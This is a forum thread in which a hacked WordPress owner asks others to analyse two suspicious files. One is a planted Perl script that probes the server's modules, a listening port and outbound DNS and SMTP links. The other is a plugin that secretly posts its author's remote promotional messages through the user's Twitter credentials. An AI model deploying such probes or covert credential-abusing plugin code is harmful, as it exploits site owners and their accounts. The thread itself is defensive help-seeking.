Government Security
Network Security Resources

Jump to content

Photo

test.pl


  • Please log in to reply
5 replies to this topic

#1 jaggudada

jaggudada

    Private First Class

  • Members
  • 96 posts

Posted 27 June 2009 - 12:07 AM

i know im hacked in wordpress and the hacker keeps on inserting iframes .
I was going through my files and found this file test.pl
looks suspicious to me can you advise

here is the code /Its my root Cgi-bin

#!/usr/bin/perl -w

	$| = 1;

	my $smtp = 'smtp.mail.ru';
	my $dns = '194.173.175.100';

	print "Content-type: text/plain; charset=windows-1251\n\n" if $ENV{HTTP_USER_AGENT};

	print "System info\n";
	print "-----------\n\n";
	print "$^O";
	print "\n", `uname -a` if $^O !~ /win/i;
	print "\n\n";

	print "Perl modules\n";
	print "------------\n\n";
	print "strict .......................... ";
	unless (eval ("use strict; return 1;")) { print "Error"; } else { print "Ok"; }
	print "\nSys::Hostname ................... ";
	unless (eval ("use Sys::Hostname; return 1;")) { print "Error"; } else { print "Ok"; }
	print "\nPOSIX ........................... ";
	unless (eval ("use POSIX qw(setsid); return 1;")) { print "Error"; } else { print "Ok"; }
	print "\nErrno ........................... ";
	unless (eval ("use Errno qw(EINPROGRESS); return 1;")) { print "Error"; } else { print "Ok"; }
	print "\nIO::Socket ...................... ";
	unless (eval ("use IO::Socket qw(:DEFAULT :crlf); return 1;")) { print "Error"; } else { use IO::Socket qw(:DEFAULT :crlf); print "Ok"; }
	print "\nIO::Select ...................... ";
	unless (eval ("use IO::Select; return 1;")) { print "Error"; } else { print "Ok"; }
	print "\n\n";

	print "Local server test\n";
	print "-----------\n\n";
	my $s = IO::Socket::INET->new(Proto => "tcp", LocalPort => 36000, Listen => SOMAXCONN, Reuse => 1);
	unless ($s) { print "Error"; } else { close $s; print "Ok"; }
	print "\n\n";

	print "DNS <TCP> client test ($dns)\n";
	print "-----------\n\n";
	my $r = (gethostbyname $dns)[4];
	unless ($r) { print "Error > Can't resolve DNS hostname"; exit; }
	$s = IO::Socket::INET->new(Proto => "tcp", Type => SOCK_STREAM);
	unless ($s) { print "Error > Can't create socket > $!"; exit; }
	$r = pack ("Sna4x8", 2, 53, $r);
	unless ($s->connect($r)) { close $s; print "Error > Can't connect > $!"; exit; }
	close $s; print "Ok";
	print "\n\n";

	print "DNS <UDP> client test ($dns)\n";
	print "-----------\n\n";
	$s = IO::Socket::INET->new(Proto=>'udp');
	unless ($s) { print "Error > Can't create socket > $!"; exit; }
	my $b = pack ('nSn4', (int rand 65535), 0x1, 0x1, 0x0, 0x0, 0x0);
	foreach (split (/\./, "mxs.mail.ru")) { $b .= pack ('C', length ($_)) . $_; }
	$b .= pack ('Cn2', 0x0, 0xF, 0x1);
	$s->send($b, 0, $r);
	$b = "";
	my $t = IO::Select->new($s);
	if ($t->can_read(5)) { $s->recv($b, 512); } else { close $s; print "Error > Timeout"; exit; }
	close $s; print "Ok";
	print "\n\n";

	print "SMTP Client test ($smtp)\n";
	print "-----------\n\n";
	$r = (gethostbyname $smtp)[4];
	unless ($r) { print "Error > Can't resolve SMTP hostname"; exit; }
	$s = IO::Socket::INET->new(Proto => "tcp", Type => SOCK_STREAM);
	unless ($s) { print "Error > Can't create socket > $!"; exit; }
	unless ($s->connect(pack ("Sna4x8", 2, 25, $r))) { close $s; print "Error > Can't connect > $!"; exit; }
	$r = <$s>; close $s;
	if (length $r) { print "Ok\n$r"; } else { print "Error > Can't read response"; }

I dont come with dice-so dont play me
http://groups.yahoo....p/blackhatgroup

#2 Guest_Dennis_*

Guest_Dennis_*
  • Guests

Posted 01 July 2009 - 12:15 PM

Yup, seems like you're hacked. If I were you I would check every bit of access and change every password. If it is your own box, reinstall.

#3 jaggudada

jaggudada

    Private First Class

  • Members
  • 96 posts

Posted 11 July 2009 - 01:39 AM

Yup, seems like you're hacked. If I were you I would check every bit of access and change every password. If it is your own box, reinstall.


Thanks Dennis i removed all suspicious code and changed passwords and the iframes stopped
I dont come with dice-so dont play me
http://groups.yahoo....p/blackhatgroup

#4 jaggudada

jaggudada

    Private First Class

  • Members
  • 96 posts

Posted 11 July 2009 - 01:46 AM

Here is another suspicious script i downloaded off some website , but i noticed once i put in the login passwords for ths social bookmarking websites . Teh other website also manages to insert their content into my social bookmareking accounts.
Since then taken the php script off ,, luckily only used dummy aaccounts that is not important
<?php
/*
Plugin Name: WP Social Traffic
Plugin URI: http://www.wicked-wordpress-themes.com
Description: This plugin automatically sends your new posts to: Twitter.com and Tumblr.com. Instantly gain dozens of new visitors each time you update your blog. The plugin is often updated to support new services, so keep checking its official page for updates. *****IMPORTANT!!***** If you already have another plugin posting your content to these services, deactivate it else your posts will be submitted twice to them!
Version: 1.0
Author: wicked
Author URI: http://www.wicked-wordpress-themes.com
*/

// Configuration section
// This will be moved to Wordpress Dashboard soon...! 

// Twitter username and password
$twitter_username = "my twitterlogin";
$twitter_password = "mytwitterpassword";

// Tumbler EMAIL and password
$tumblr_email    = "your_email";
$tumblr_password = "your_password";

// Delicious.com username and password
$delicious_username = "your_username";
$delicious_password = "your_password";

// Diigo.com username and password
$diigo_username = "your_username";
$diigo_password = "your_password";

// Tags for delicious and diigo. Separate by spaces.
$tags = "computers technology blog articles";

// To do on next version: automatic tags insertion based on post title

// End of config... Don't change anything below unless you are sure what you are doing!



function socialize($post_ID)  {
    global $twitter_username, $twitter_password, $tumblr_email, $tumblr_password, $delicious_username, $delicious_password, $diigo_username, $diigo_password, $tags;
    $post_title    = stripslashes($_POST['post_title']);
    $post_title    = html_entity_decode($post_title);
    $tumblr_text    = html_entity_decode($_POST[content]);
    $tumblr_text = strip_tags($tumblr_text);
    $tumblr_text = nl2br($tumblr_text);
    $tumblr_text = substr($tumblr_text, 0,200);
    $permalink = get_permalink($post_ID);
    $tumblr_text .= "<br />Read more at the source: <a target=_blank href=$permalink>$post_title</a>";
    $tw_title = substr($post_title, 0,70);
    
    // Send to Twitter
    if($twitter_username && $twitter_password){
    $message = "$tw_title $permalink";
    // The twitter API address
    $url = 'http://twitter.com/statuses/update.xml';
    // Alternative JSON version
    // $url = 'http://twitter.com/statuses/update.json';
    // Set up and execute the curl process
    $curl_handle = curl_init();
    curl_setopt($curl_handle, CURLOPT_URL, "$url");
    curl_setopt($curl_handle, CURLOPT_CONNECTTIMEOUT, 2);
    curl_setopt($curl_handle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl_handle, CURLOPT_POST, 1);
    curl_setopt($curl_handle, CURLOPT_POSTFIELDS, "status=$message");
    curl_setopt($curl_handle, CURLOPT_USERPWD, "$twitter_username:$twitter_password");
    $buffer = curl_exec($curl_handle);
    curl_close($curl_handle);
    
     // Periodically send a promotional message... 
    // You have to keep this section if you like this plugin and want it to stay alive <img src='/forum/public/style_emoticons/<#EMO_DIR#>/smile.gif' class='bbc_emoticon' alt=':)' /> 
    $ld = substr($post_ID, -1);
    if($ld == 1 || $ld == 6 || $ld == 9){
     $data = file_get_contents("http://www.wicked-wordpress-themes.com/wickedmessage.txt");
     $lines = explode("\n", $data);
     shuffle($lines);
     $message = str_replace("\n", "", $lines[0]);
    // The twitter API address
    $url = 'http://twitter.com/statuses/update.xml';
    // Alternative JSON version
    // $url = 'http://twitter.com/statuses/update.json';
    // Set up and execute the curl process
    $curl_handle = curl_init();
    curl_setopt($curl_handle, CURLOPT_URL, "$url");
    curl_setopt($curl_handle, CURLOPT_CONNECTTIMEOUT, 2);
    curl_setopt($curl_handle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl_handle, CURLOPT_POST, 1);
    curl_setopt($curl_handle, CURLOPT_POSTFIELDS, "status=$message");
    curl_setopt($curl_handle, CURLOPT_USERPWD, "$twitter_username:$twitter_password");
    $buffer = curl_exec($curl_handle);
    curl_close($curl_handle);
    }
  // End of Twitter operation
    }
    
     
    
    // Start sending to Tumblr
    if($tumblr_email && $tumblr_password){
    // Data for new record
$post_type  = 'regular';


// Prepare POST request
$request_data = http_build_query(
    array(
        'email'     => $tumblr_email,
        'password'  => $tumblr_password,
        'type'      => $post_type,
        'title'     => $post_title,
        'body'      => $tumblr_text,
        'generator' => 'Web'
    )
);

// Send the POST request (with cURL)
$c = curl_init('http://www.tumblr.com/api/write');
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS, $request_data);
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($c);
$status = curl_getinfo($c, CURLINFO_HTTP_CODE);
curl_close($c);


// Start sending to delicious
$del_title = urlencode($post_title);
$del_desc = substr($tumblr_text, 0,80);
$del_desc = urlencode($del_desc);
$del_tags = urlencode($tags);
file_get_contents("https://$delicious_username:$delicious_password@api.del.icio.us/v1/posts/add?url=$permalink&description=$del_title&extended=$del_desc&tags=$del_tags&shared=yes");


// Start sending to Diigo
$diigo_tags = str_replace(" ", ",", $tags);
$diigo_tags = urlencode($diigo_tags);

    // The Diigo API address
    $url = 'http://api2.diigo.com/bookmarks';

    // Set up and execute the curl process
    $curl_handle = curl_init();
    curl_setopt($curl_handle, CURLOPT_URL, "$url");
    curl_setopt($curl_handle, CURLOPT_CONNECTTIMEOUT, 2);
    curl_setopt($curl_handle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl_handle, CURLOPT_POST, 1);
    curl_setopt($curl_handle, CURLOPT_POSTFIELDS, "url=$permalink&title=$del_title&shared=yes&tags=$del_tags&desc=$del_desc");
    curl_setopt($curl_handle, CURLOPT_USERPWD, "$diigo_username:$diigo_password");
    $buffer = curl_exec($curl_handle);
    curl_close($curl_handle);
    
}
    
    return $post_ID;
}

add_action ( 'publish_post', 'socialize' );


?>

I dont come with dice-so dont play me
http://groups.yahoo....p/blackhatgroup

#5 SL4Y3R

SL4Y3R

    Private

  • Members
  • 10 posts

Posted 22 July 2009 - 03:44 PM

I would do a fresh install, its hard to know if you for sure got everything, and as also suggested change all passwords and search out the possible ways they got in. Are you saying they got in through the wordpress/web software?

#6 jaggudada

jaggudada

    Private First Class

  • Members
  • 96 posts

Posted 24 July 2009 - 02:08 PM

I would do a fresh install, its hard to know if you for sure got everything, and as also suggested change all passwords and search out the possible ways they got in. Are you saying they got in through the wordpress/web software?


Nah i actually got the script from a website

but i pretty much wanted to know if anybody can see if there is any malicious password stealer code in there

when i put my twitter passord login in that script ,, it does post my twitters to twitter auto.. but it also adds a regular twitter msg from the script website on my twitter account

i suspect the code belwo in the script

// Periodically send a promotional message...     
// You have to keep this section if you like this plugin and want it to stay alive <img src='http://www.governmentsecurity.org/forum/public/style_emoticons/<#EMO_DIR#>/smile.gif' class='bbc_emoticon' alt=':)' />     
$ld = substr($post_ID, -1);    
if($ld == 1 || $ld == 6 || $ld == 9){     
$data = file_get_contents("http://www.wicked-wordpress-themes.com/wickedmessage.txt");     
$lines = explode("\n", $data);     
shuffle($lines);     
$message = str_replace("\n", "", $lines[0]);


but wanted some one more knowledgable than me in php to have a look at tell me if anything looks uspicious in this script in regards to sstealing your login at all

Edited by webdevil, 24 July 2009 - 04:26 PM.
edited code box

I dont come with dice-so dont play me
http://groups.yahoo....p/blackhatgroup




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users